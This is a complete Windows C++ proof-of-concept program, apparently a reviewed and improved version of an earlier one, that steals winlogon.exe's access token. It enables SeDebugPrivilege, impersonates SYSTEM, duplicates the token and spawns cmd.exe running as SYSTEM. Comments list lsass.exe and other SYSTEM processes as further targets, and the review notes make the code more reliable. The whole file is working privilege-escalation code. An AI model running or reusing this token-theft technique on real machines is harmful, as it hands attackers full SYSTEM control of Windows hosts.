#include <windows.h>
#include <Lmcons.h>
#include <tlhelp32.h>

#include <cstdio>
#include <cwchar>
#include <iostream>
#include <string>
// Enables (bEnablePrivilege == TRUE) or disables a single named privilege on
// the given access token, using the usual LookupPrivilegeValue +
// AdjustTokenPrivileges sequence. hToken must have been opened with
// TOKEN_ADJUST_PRIVILEGES (main() does exactly that).
//
// Returns TRUE when the privilege was adjusted. Returns FALSE, after printing
// the Win32 error, when the privilege name is unknown, the adjustment call
// fails, or the token simply does not hold the privilege: in that last case
// AdjustTokenPrivileges still reports success and only sets the last error to
// ERROR_NOT_ALL_ASSIGNED, so GetLastError() has to be consulted even on TRUE.
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
    LUID privilegeId;
    if (!LookupPrivilegeValue(NULL, lpszPrivilege, &privilegeId))
    {
        printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
        return FALSE;
    }

    TOKEN_PRIVILEGES adjustment;
    adjustment.PrivilegeCount = 1;
    adjustment.Privileges[0].Luid = privilegeId;
    adjustment.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    // DisableAllPrivileges is FALSE, so only the one entry in `adjustment` is
    // touched; previous state is not requested (both out-params NULL).
    const BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &adjustment,
                                                sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    if (!adjusted)
    {
        printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
        return FALSE;
    }

    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        printf("[-] The token does not have the specified privilege. \n");
        return FALSE;
    }

    return TRUE;
}
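// Returns the account name of the user the calling thread currently runs as
// (main() calls this before and during impersonation to show the switch),
// narrowed to the ANSI code page so it can be printed with printf("%s").
//
// Returns an empty string if GetUserNameW or the narrowing conversion fails.
// The original ignored GetUserName's return value and then read the
// uninitialized buffer, and narrowed by truncating each wchar_t to a char,
// which mangles any non-ASCII character in the name.
std::string get_username()
{
    wchar_t username[UNLEN + 1] = {};
    DWORD username_len = UNLEN + 1;
    if (!GetUserNameW(username, &username_len))
    {
        return std::string();
    }

    // On success username_len includes the terminating NUL; drop it.
    const int wide_len = static_cast<int>(username_len) - 1;
    if (wide_len <= 0)
    {
        return std::string();
    }

    const int narrow_len = WideCharToMultiByte(CP_ACP, 0, username, wide_len,
                                               nullptr, 0, nullptr, nullptr);
    if (narrow_len <= 0)
    {
        return std::string();
    }

    std::string username_s(static_cast<size_t>(narrow_len), '\0');
    WideCharToMultiByte(CP_ACP, 0, username, wide_len,
                        &username_s[0], narrow_len, nullptr, nullptr);
    return username_s;
}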
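// Returns the PID of the first running process whose image name matches
// processName (e.g. L"winlogon.exe"), or 0 if the snapshot cannot be taken or
// nothing matches. The comparison is case-insensitive: Windows image names
// are not case-sensitive, so "WinLogon.exe" and "winlogon.exe" name the same
// binary and the original exact compare could miss it.
//
// Fixes over the original: Process32First's result is checked (on failure the
// old code compared an uninitialized szExeFile), the first/next handling is a
// single loop, and the snapshot handle is closed on every path.
//
// NOTE(review): only the image *name* is matched, so any process that happens
// to be called winlogon.exe - including one started by an unprivileged user -
// satisfies this lookup. A caller that needs the real system process should
// verify the owner or image path of the PID it gets back.
DWORD FindProcessId(const std::wstring& processName)
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    DWORD pid = 0;
    PROCESSENTRY32W entry;
    entry.dwSize = sizeof(entry);

    if (Process32FirstW(snapshot, &entry))
    {
        do
        {
            if (_wcsicmp(processName.c_str(), entry.szExeFile) == 0)
            {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32NextW(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return pid;
}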
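// Proof of concept: duplicate the primary token of winlogon.exe and start
// cmd.exe with it. In practice this needs an elevated caller - SeDebugPrivilege
// is enabled below so winlogon can be opened, and CreateProcessWithTokenW
// itself requires SeImpersonatePrivilege in the caller's token (and the
// Secondary Logon service to be running).
//
// Returns 0 on success, 1 at the first failed step. Every Win32 call is now
// checked through its return value: the original tested GetLastError() == 0
// after each call, which is unreliable because a successful call is not
// required to reset the thread's last-error code, and it carried on after
// failures (e.g. calling OpenProcessToken on a NULL process handle).
int main()
{
    // Print whoami first so the impersonated identity below can be compared against it.
    printf("[+] Current user is: %s\n", get_username().c_str());

    // Other SYSTEM-owned targets listed by the original author:
    // lsass.exe, OfficeClickToRun.exe, dllhost.exe, unsecapp.exe.
    const std::wstring targetName(L"winlogon.exe");
    printf("[!] Searching for WinLogon PID!\n");
    const DWORD targetPid = FindProcessId(targetName);
    if (targetPid == 0)
    {
        // The original pressed on with PID 0, which only made OpenProcess fail later.
        printf("[-] winlogon.exe not found, nothing to impersonate\n");
        return 1;
    }
    printf("[!] Found Winlogon Process ID: %lu\n", targetPid);

    // Enable SeDebugPrivilege on our own token so a protected SYSTEM process can
    // be opened. A failure here is reported by SetPrivilege but is not fatal on
    // its own; the following OpenProcess is where it actually shows up.
    HANDLE currentTokenHandle = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle))
    {
        printf("[-] OpenProcessToken(self) Error: %lu\n", GetLastError());
        return 1;
    }
    if (SetPrivilege(currentTokenHandle, SE_DEBUG_NAME, TRUE))
    {
        printf("[+] SeDebugPrivilege enabled!\n");
    }
    CloseHandle(currentTokenHandle);

    // PROCESS_QUERY_LIMITED_INFORMATION is all OpenProcessToken needs, and the
    // handle does not have to be inheritable: the child below is created from a
    // token, not through handle inheritance.
    HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, targetPid);
    if (processHandle == NULL)
    {
        printf("[-] OpenProcess() Error: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] OpenProcess() success!\n");

    HANDLE tokenHandle = NULL;
    if (!OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &tokenHandle))
    {
        printf("[-] OpenProcessToken() Error: %lu\n", GetLastError());
        CloseHandle(processHandle);
        return 1;
    }
    CloseHandle(processHandle);
    printf("[+] OpenProcessToken() success!\n");

    // Impersonate on this thread only to demonstrate that the token is usable,
    // then revert immediately so the rest of main runs in the original context.
    if (ImpersonateLoggedOnUser(tokenHandle))
    {
        printf("[+] ImpersonatedLoggedOnUser() success!\n");
        printf("[+] Current user is: %s\n", get_username().c_str());
        printf("[+] Reverting thread to original user context\n");
        RevertToSelf();
    }
    else
    {
        // The original printed the OpenProcessToken result here instead of this call's error.
        printf("[-] ImpersonatedLoggedOnUser() Error: %lu\n", GetLastError());
    }

    // A primary token copy is required to create a new process from it.
    HANDLE duplicateTokenHandle = NULL;
    if (!DuplicateTokenEx(tokenHandle,
                          TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY,
                          NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle))
    {
        printf("[-] DuplicateTokenEx() Error: %lu\n", GetLastError());
        CloseHandle(tokenHandle);
        return 1;
    }
    CloseHandle(tokenHandle);
    printf("[+] DuplicateTokenEx() success!\n");

    STARTUPINFOW startupInfo = {};
    startupInfo.cb = sizeof(startupInfo);
    PROCESS_INFORMATION processInformation = {};

    // Full image path, so no PATH or current-directory lookup is involved.
    const BOOL created = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE,
                                                 L"C:\\Windows\\System32\\cmd.exe", NULL, 0,
                                                 NULL, NULL, &startupInfo, &processInformation);
    if (!created)
    {
        printf("[-] CreateProcessWithTokenW Error: %lu\n", GetLastError());
        CloseHandle(duplicateTokenHandle);
        return 1;
    }
    CloseHandle(duplicateTokenHandle);
    printf("[+] Process spawned! PID: %lu\n", processInformation.dwProcessId);

    // The child is not waited on; just release our handles to it.
    CloseHandle(processInformation.hThread);
    CloseHandle(processInformation.hProcess);
    return 0;
}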